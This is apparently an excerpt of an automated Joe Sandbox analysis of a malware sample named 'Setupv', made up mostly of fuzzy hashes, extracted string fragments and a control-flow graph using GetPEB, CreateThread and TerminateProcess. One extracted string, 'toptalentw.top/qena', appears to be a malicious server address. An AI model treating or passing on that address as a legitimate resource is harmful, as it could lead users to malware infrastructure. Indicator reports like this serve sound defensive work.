• Opcode Fuzzy Hash: 32678ae02ba6db916ad4ab09d216c0db73b9bddd0e8b9a2681d06b921df1debc
• Instruction Fuzzy Hash: 2751AD7164D3508FD301EF79948835FBFE1AB85358F08A92EE5C587381DA748649CB93

Strings
Memory Dump Source
• Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
Similarity
• API ID:
• String ID: "$+$+r3G$0$=$D$E$F$F$G$G$H$H$I$I
• API String ID: 0-2892116429
• Opcode ID: 66d38afb40e206f17c523159bcde443870cfcd1f9ab590f69f6d5b355269dd98
• Instruction ID: a5cb1c1e121f087c7af1cb50f9f7884ce8d3fd06a465ee349c54bc31354e1e43
• Opcode Fuzzy Hash: 66d38afb40e206f17c523159bcde443870cfcd1f9ab590f69f6d5b355269dd98
• Instruction Fuzzy Hash: C582B4766487908BD338DF39C49539FBBE2AFC4314F09992DD8DA87391DA748845CB42

Strings
Memory Dump Source
• Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
Similarity
• API ID:
• String ID: -(:*$4567$@$GFIH$GFIH$J$L$P$X54&
• API String ID: 0-4168977390
• Opcode ID: 15659f6195f1a1d0fb462983aa3c435ac871d4adc3077a641b85451f82346a24
• Instruction ID: 9f7d1ca202485449d4c32dd3badfb742a005c9c5b9a245eea4b74b20cc5cc4c7
• Opcode Fuzzy Hash: 15659f6195f1a1d0fb462983aa3c435ac871d4adc3077a641b85451f82346a24
• Instruction Fuzzy Hash: 37C20572A483508BD724CF29C8557ABB7E2FFC4318F15D92DE9D99B280DB749805CB82
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: $3$S$S$U$V$\$c$y
                                                                                                                                                                                                                          • API String ID: 0-4229947325
                                                                                                                                                                                                                          • Opcode ID: 7a5423f90ef40171aefc5af30662778270309252dca8d8c36a059816dcc4a809
                                                                                                                                                                                                                          • Instruction ID: 9b4ff151472d368c84df60064c2a203bd69dd8952f13d8967bfeb4b4f56308c3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a5423f90ef40171aefc5af30662778270309252dca8d8c36a059816dcc4a809
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26D1663365C7A04BD318C97D884129FBFC25BC5224F0DCA3DE8EAD7382D9A8C9058792
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: !5#,$'#'$/-),$5$>86>$J$T$ih
                                                                                                                                                                                                                          • API String ID: 0-2766606888
                                                                                                                                                                                                                          • Opcode ID: 1fe626059962fd580f825aa7d30306c2aa2ec4c590acafad5bca28e750327c78
                                                                                                                                                                                                                          • Instruction ID: 2c6b5bc6686218dfa3b91239e841d88c26f2b77b6ed3cc55deb419255e7d2f59
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1fe626059962fd580f825aa7d30306c2aa2ec4c590acafad5bca28e750327c78
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F1205725583918BD325CF29C49076BBBE2BFC6308F189A6DE4D5DB381D7788509CB82
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: )Ms$,h+J$,h+J$SWH`$WWH`$|}$u{
                                                                                                                                                                                                                          • API String ID: 0-1644346604
                                                                                                                                                                                                                          • Opcode ID: 435b0826bcaab2877061842dbf832956c1d3f76bb60962782365d402b85a8c60
                                                                                                                                                                                                                          • Instruction ID: a380b6f83b00002c4b8a2c3991d59d75ec3b2d2310c90a95bdaac3f8a9d6a617
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 435b0826bcaab2877061842dbf832956c1d3f76bb60962782365d402b85a8c60
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9F110715483418BC720CF28D86122BB7E2FFC6318F189A2DE9D58B391E735D905CB96
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 2$5$A$J$q$s$u
                                                                                                                                                                                                                          • API String ID: 0-3366776672
                                                                                                                                                                                                                          • Opcode ID: cdb3fd810debcd08b2c6777ea5a5ba68934d62df4cd0dc600510c5ef91f29b55
                                                                                                                                                                                                                          • Instruction ID: 74a65744eeb44ca7ddfd306bc7a39e79263ba5a29f54e3fc12e718bd84656529
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cdb3fd810debcd08b2c6777ea5a5ba68934d62df4cd0dc600510c5ef91f29b55
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F226C75A4C7908BC334DF38C4943AEBBE2AFC9310F059A2DE9DA87391DA748545CB42
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: "0+2$(<(($//30$1$&8$:)3$toptalentw.top/qena$ !3
                                                                                                                                                                                                                          • API String ID: 0-1144212160
                                                                                                                                                                                                                          • Opcode ID: e175cee0d710ad9fe885e6b428efed09499abc2578e7bc1cabdb524406c68dca
                                                                                                                                                                                                                          • Instruction ID: 4941d90208ce599786c48b94ccfaad79c995e8bbce3225e81e5fcd8820967c3a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e175cee0d710ad9fe885e6b428efed09499abc2578e7bc1cabdb524406c68dca
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6ED19E766883504FD310CF6598913EBBBD2EBC1328F189E2CE5E58B392D77585098BC2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: GFIH$a+<Z$a+<Z$a+<Z$a+<Z$0?~
                                                                                                                                                                                                                          • API String ID: 0-691672923
                                                                                                                                                                                                                          • Opcode ID: 554e3d2dd7d3834a601f5674abd95b7773e98a2e9c175ea10ceec1dca931afc7
                                                                                                                                                                                                                          • Instruction ID: 59d50b15eb0a72f647c727fb2781b3e13914ab836d10e18cf07377cb958c9c16
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 554e3d2dd7d3834a601f5674abd95b7773e98a2e9c175ea10ceec1dca931afc7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7625BB1A983208FD314DF28C881767B7E1EF85318F19E92CE98697391E775D908C792
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: -$9$B$h$j$j
                                                                                                                                                                                                                          • API String ID: 0-1340328496
                                                                                                                                                                                                                          • Opcode ID: 2d0b6e0954a410c12349e36e1b9f2970f50a8884589ab6992b9620bde379b04f
                                                                                                                                                                                                                          • Instruction ID: cc92bba90d5fc02bd1492abc5bed118655d07300ee11d54cf9bc505e62828026
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d0b6e0954a410c12349e36e1b9f2970f50a8884589ab6992b9620bde379b04f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F142D776A4C7908BC324DF39884039EFBD6ABC5324F199A6DD4DAC7391DA788805CB42
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: GFIH$GFIH$GFIH$f$?`m$?`m
                                                                                                                                                                                                                          • API String ID: 0-2726261967
                                                                                                                                                                                                                          • Opcode ID: df8bb9d78604c9c71988def96082f2a37a9fce914202a029dba6b25e83fcdc16
                                                                                                                                                                                                                          • Instruction ID: ea92bafc23bd84214909239f3935e5a62e4df86d65c753a2eeea9e1f2a59a484
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df8bb9d78604c9c71988def96082f2a37a9fce914202a029dba6b25e83fcdc16
• Instruction Fuzzy Hash: FF021572AA83608BD314CF18C980B6BF7E6BFC4318F58DA1DEC9497291D775D8418B92

Strings
Memory Dump Source
• Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
Similarity
• API ID:
• String ID: $E20D74B03AC0FC2B090A0D98DD00725C$j-J+$lm$}{
• API String ID: 0-1693390246
• Opcode ID: dfb5e287c56179632fe9dd1e56654783f5099ff31c9c285fd46d37b3eae5d6c4
• Instruction ID: 51120f334acb0ad3ef08faf53d08a9eeb38e000a54831dca9c226ed880f3476a
• Opcode Fuzzy Hash: dfb5e287c56179632fe9dd1e56654783f5099ff31c9c285fd46d37b3eae5d6c4
• Instruction Fuzzy Hash: 44B1F1B56487408BC718CF25C8906ABBBE2FFC5308F18996DE4D68B255DB34D50ACB52

Strings
Memory Dump Source
• Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
Similarity
• API ID:
• String ID: ><X$\$0?~$?`m
• API String ID: 0-3592648234
• Opcode ID: 23fdb0df4a590bc3224316aeecc9cd732b1c0ea93adf275b980924623c89960f
• Instruction ID: c8f51bd7d7b58f614733bd1798b13fc95f49b6aa7ee0e3472e1af29d46a7a174
• Opcode Fuzzy Hash: 23fdb0df4a590bc3224316aeecc9cd732b1c0ea93adf275b980924623c89960f
• Instruction Fuzzy Hash: 4B324A726583618FC318CF18D8902AFF7E1EBC5314F159A2DE8E69B391C7749906CB92

Strings
Memory Dump Source
• Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
Similarity
• API ID:
• String ID: GFIH$GFIH$GFIHGFIH$a+<Z
• API String ID: 0-819695447
• Opcode ID: fdffb7df5b7bf826fd88c8c2c2edc2de8cc59e0c3946e92aa9ced476ed72263b
• Instruction ID: a714c977dc5252951f807e90c0440f08adfac49ffb71c33454655324d02b6bea
• Opcode Fuzzy Hash: fdffb7df5b7bf826fd88c8c2c2edc2de8cc59e0c3946e92aa9ced476ed72263b
• Instruction Fuzzy Hash: BCD12671A983208BD324CF29C89072BF7E2AFC9718F15DA2CEE9997295D735D801C791

Strings
Memory Dump Source
• Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
Similarity
• API ID:
• String ID: )$IDAT$IEND$IHDR
• API String ID: 0-3181356877
• Opcode ID: 72edd46e0a4861403ea364714185f85c9edb9990f9f151956dd44f70992dc03e
• Instruction ID: 339c7f573666faab6e2e1cd4867269c9fb77863d084439035cb2326764ae7c12
• Opcode Fuzzy Hash: 72edd46e0a4861403ea364714185f85c9edb9990f9f151956dd44f70992dc03e
• Instruction Fuzzy Hash: 44D1ADB1A483449FD720CF24C845B9BBBE1AF94308F14996DF9999B381D375D908CF92

Strings
Memory Dump Source
• Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
Similarity
• API ID:
• String ID: hl7$ll7$ac
• API String ID: 0-258634020
• Opcode ID: 8b7d1cec3482e14e65a26d11869eaa22ace84f657b394b35f119ce8d26c4b539
• Instruction ID: 7b198c4b4874e2b983a2944eac9af5b3c792d863bfc30696b8b326c4105764e3
• Opcode Fuzzy Hash: 8b7d1cec3482e14e65a26d11869eaa22ace84f657b394b35f119ce8d26c4b539
• Instruction Fuzzy Hash: 18723B72A487508FC318CF29C89065BFBE2BFC8314F19892EE999D7355DB749805CB86

Strings
Memory Dump Source
• Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
Similarity
• API ID:
• String ID: !$s$z
• API String ID: 0-39609933
• Opcode ID: 7a5897ae5446c69e75d4dc6b6f1f1a393073668a3e24e1d86889d8cdee39d11c
• Instruction ID: 1dfdacfd3b1b77565b8a8f9a9e74792c0766408aef09d4fc14115a4d0f4883b4
• Opcode Fuzzy Hash: 7a5897ae5446c69e75d4dc6b6f1f1a393073668a3e24e1d86889d8cdee39d11c
• Instruction Fuzzy Hash: 49E171B554C7508BD324DF38C5903AEBBE2AFD8314F199A2EE8DAC7381DA748445CB42

Strings
Memory Dump Source
• Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
Similarity
• API ID:
• String ID: GFIH$a+<Z$a+<Z
• API String ID: 0-957137415
• Opcode ID: 4f31859daed8f08bcb284263426ad925742d4043975dc3584a41d1e727b64c3b
• Instruction ID: 7ce56ed34f676ae323545e02fe7bfbf38bc5325591e4c98a2d206b9f72cfc70d
• Opcode Fuzzy Hash: 4f31859daed8f08bcb284263426ad925742d4043975dc3584a41d1e727b64c3b
• Instruction Fuzzy Hash: 5B61ED34681A518FD3288F28C45573AB3E2FF81319F66EA6AD4D797290DB34B895CB40

Strings
Memory Dump Source
• Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
Similarity
• API ID:
• String ID: <=$O-_+$P!{?
• API String ID: 0-2826889232
• Opcode ID: 442b49ac8609b7eaec9aa8aff133b52df6395876d10d0d039bc9c8602de1e698
• Instruction ID: af1b1a84d12acdf0476d087b33d553d334dadd1ae602f23c9712873c2b009462
• Opcode Fuzzy Hash: 442b49ac8609b7eaec9aa8aff133b52df6395876d10d0d039bc9c8602de1e698
• Instruction Fuzzy Hash: DE31227299C3208AC714CF15C890227B7F2EFC6694F099A5DE8D59B660E7398905CBE2

Strings
Memory Dump Source
• Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
Similarity
• API ID:
• String ID: 0$8
• API String ID: 0-46163386
• Opcode ID: 4bd60bf1f8aa0f2d4f7edf573e90e7d2180740a8a1e3c216ea3987c033414842
• Instruction ID: 6cb4dd3cc7e36335422f29553432d9c1c14e56309818ea3d3de257dad0b11415
• Opcode Fuzzy Hash: 4bd60bf1f8aa0f2d4f7edf573e90e7d2180740a8a1e3c216ea3987c033414842
• Instruction Fuzzy Hash: A17258716083419FE714CF28C880BABBBE1BF88718F04992DF99987391D775D958CB92

Strings
Memory Dump Source
• Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
Similarity
• API ID:
• String ID: ~${
• API String ID: 0-1705458366
• Opcode ID: e2d801d7c768d4b9ea54a23e332fff6aed507f01760128183fdb32230e33d30f
• Instruction ID: 43e36c49928f2010acab32f35ac1660722637d811330eb3258f851c3dca65b72
• Opcode Fuzzy Hash: e2d801d7c768d4b9ea54a23e332fff6aed507f01760128183fdb32230e33d30f
• Instruction Fuzzy Hash: A2025EB4900B009FC364DF39C946BA3BBF5FB45310F049A6DE4AACB795E735A4058B92

Strings
Memory Dump Source
• Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 1UHK$TUVW1UHK
                                                                                                                                                                                                                          • API String ID: 0-2946786801
                                                                                                                                                                                                                          • Opcode ID: 25e6fea26df132599c925c4e171fa37cb07f5b7672f8d82f6b74a4d921257ad6
                                                                                                                                                                                                                          • Instruction ID: aea519bf8c0bd2ebaa6d5d28fc879c13cd6e5c6a652c83dd949cb25ed250595d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25e6fea26df132599c925c4e171fa37cb07f5b7672f8d82f6b74a4d921257ad6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52F1DC71A093419BD724DF28C885A6BFBE5EFC5318F04992CE9D98B380E7B4D805CB46
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: URS$YW
                                                                                                                                                                                                                          • API String ID: 0-3812113581
                                                                                                                                                                                                                          • Opcode ID: 512fa5f802178c9858049ccadf2b4a8245d0ddc196589dcb6aee21b239ee44ff
                                                                                                                                                                                                                          • Instruction ID: 2cda423c538ed2887aff2724fe9741b329f0040419e40438bc4b2d0d149507dc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 512fa5f802178c9858049ccadf2b4a8245d0ddc196589dcb6aee21b239ee44ff
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69C16672A583608BE314DB28CD417ABB7D6AFC5308F09D93DED85D7242EA34E90587D2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: xy$}{
                                                                                                                                                                                                                          • API String ID: 0-123651060
                                                                                                                                                                                                                          • Opcode ID: 06065dac2b9c203641ca009bee2deef784400d2eb55ad17d4b2fa87674ddc375
                                                                                                                                                                                                                          • Instruction ID: 896ee902545ebf383de9ce77d831d3625db813bd4b1ada66fb0396ea53b59c86
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06065dac2b9c203641ca009bee2deef784400d2eb55ad17d4b2fa87674ddc375
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 307102715483108BC718CF19C89166BB3B2EFD1368F29EA2CE8D94B394E735C941CB96
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: $ v!$jLrP
                                                                                                                                                                                                                          • API String ID: 0-3960616530
                                                                                                                                                                                                                          • Opcode ID: 466b18361d32435c174c91ad11d79e6d3a44d0017f75a5d2eec7ff72e2da08d1
                                                                                                                                                                                                                          • Instruction ID: 4d530d6b5d06cabec9e57e97a3bbb7a0fbde36689cb96adeda66558db5acaca8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 466b18361d32435c174c91ad11d79e6d3a44d0017f75a5d2eec7ff72e2da08d1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A751C17154C7D18FC325CF2990A036AFFE0AFA6344F6898AEE4D997352CB758404CB52
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: S}&$W}&
                                                                                                                                                                                                                          • API String ID: 0-1213038652
                                                                                                                                                                                                                          • Opcode ID: 8c88b4c76443acdccb166bcc6bf9338eda16d67df25db79be61b07939df1bb3f
                                                                                                                                                                                                                          • Instruction ID: baa48105a32495e329952e386ab775c5f3467128e84a576f3cfb22834f6eee90
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c88b4c76443acdccb166bcc6bf9338eda16d67df25db79be61b07939df1bb3f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5941DEB19083548FE314DF25A89065BFBE6EBC5344F00CA2CE598AB295DB71950A8F82
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: hl7$ll7
                                                                                                                                                                                                                          • API String ID: 0-563782489
                                                                                                                                                                                                                          • Opcode ID: f32c30bbf2cd6983a2d3d0cc048e323b8c1d14fce89716a9f74a8dffc98cbcfc
                                                                                                                                                                                                                          • Instruction ID: 51f37c14117115108efd62f076e5d52dd4748ee8c77fbbd427c08c6020305707
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f32c30bbf2cd6983a2d3d0cc048e323b8c1d14fce89716a9f74a8dffc98cbcfc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6414676A557208BC310CF19C440B2BF7E6AFD9318F59E91DE8989B294C7369806CBD2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: )-=E
                                                                                                                                                                                                                          • API String ID: 0-2696222650
                                                                                                                                                                                                                          • Opcode ID: f6bd6f90b10815a84df54fe386dce3d34911b586df189b9adf63f4a3e37c45e3
                                                                                                                                                                                                                          • Instruction ID: 925a802fd3bbac1979cfc24194ea1ddda6ca4a7f1d00e3b6e5280e71efd151c7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f6bd6f90b10815a84df54fe386dce3d34911b586df189b9adf63f4a3e37c45e3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12724BB0655B809FD361CF39C945BA7BFE9AB0A300F04896EE1EEC7382C6756540CB56
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: %%*+
                                                                                                                                                                                                                          • API String ID: 0-1274622323
                                                                                                                                                                                                                          • Opcode ID: 98ab402573cedf33b75f0cd35d70db5905112295be48ab0fc173f644cce4c8ef
                                                                                                                                                                                                                          • Instruction ID: d2e13d14b51669b3d62b01898754797e20e169b64a266f10326afcf704987549
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98ab402573cedf33b75f0cd35d70db5905112295be48ab0fc173f644cce4c8ef
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8F1DFB19483518BC324CF25C89126BB7E1FFC5368F58DA1CE8E94B391E7759805CB82

Control-flow Graph

control_flow_graph 221 2730000-27300e3 222 27300e9-2730503 221->222 222->222 223 2730509-2730671 call 2730ab9 call 27310b9 call 2731269 call 2730e59 222->223 232 2730aa2-2730aa5 223->232 233 2730677-273067e 223->233 234 2730689-273068d 233->234 235 27306af-273072a GetPEB 234->235 236 273068f-27306ad call 2730fd9 234->236 237 2730735-2730739 235->237 236->234 239 2730751-2730763 call 2730c19 237->239 240 273073b-273074f 237->240 246 2730765-273078b 239->246 247 273078d-27307ae CreateThread 239->247 240->237 248 27307b1-27307b5 246->248 247->248 250 2730a76-2730aa0 TerminateProcess 248->250 251 27307bb-27307ee call 2731119 248->251 250->232 251->250 255 27307f4-2730843 251->255 257 273084e-2730854 255->257 258 2730856-273085c 257->258 259 273089c-27308a0 257->259 260 273086f-2730873 258->260 261 273085e-273086d 258->261 262 27308a6-27308b3 259->262 263 273096e-2730a61 call 2730c19 call 2730ab9 call 27310b9 259->263 264 2730875-2730883 260->264 265 273089a 260->265 261->260 266 27308be-27308c4 262->266 289 2730a63 263->289 290 2730a66-2730a70 263->290 264->265 269 2730885-2730897 264->269 265->257 267 27308c6-27308d4 266->267 268 27308f4-27308f7 266->268 272 27308f2 267->272 273 27308d6-27308e5 267->273 274 27308fa-2730901 268->274 269->265 272->266 273->272 277 27308e7-27308f0 273->277 274->263 279 2730903-273090c 274->279 277->268 279->263 281 273090e-273091e 279->281 283 2730929-2730935 281->283 285 2730937-2730964 283->285 286 2730966-273096c 283->286 285->283 286->274 289->290 290->250
Strings
Memory Dump Source
• Source File: 00000000.00000002.1854155673.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2730000_Setupv.jbxd
Similarity
• API ID:
• String ID: Q#
• API String ID: 0-665244491
